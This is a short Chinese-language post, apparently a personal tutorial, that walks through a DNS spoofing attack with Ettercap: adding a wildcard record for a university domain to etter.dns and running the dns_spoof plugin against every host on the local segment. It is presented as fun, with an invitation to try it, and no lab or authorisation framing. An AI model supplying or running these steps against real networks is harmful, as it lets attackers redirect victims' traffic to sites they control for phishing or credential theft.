首先,编辑/etc/ettercap/etter.dns,里面有Dns记录,
*.ddh.edu.cn A 10.10.10.10
这个是DNS记录,后面的ip是你想让Dns解析到的ip,能访问到的。
其次,就可以进行Dns欺骗攻击了
Ettercap -T -q -i eth0(网卡) -P dns_spoof /// ///
后面的三个斜杆代表全网段,也就是10.10.10.0/24
成功截图
觉得挺好玩的,他还是显示的域名,绝对不是hosts文件、浏览器缓存啥的。
You can try it! It's fun.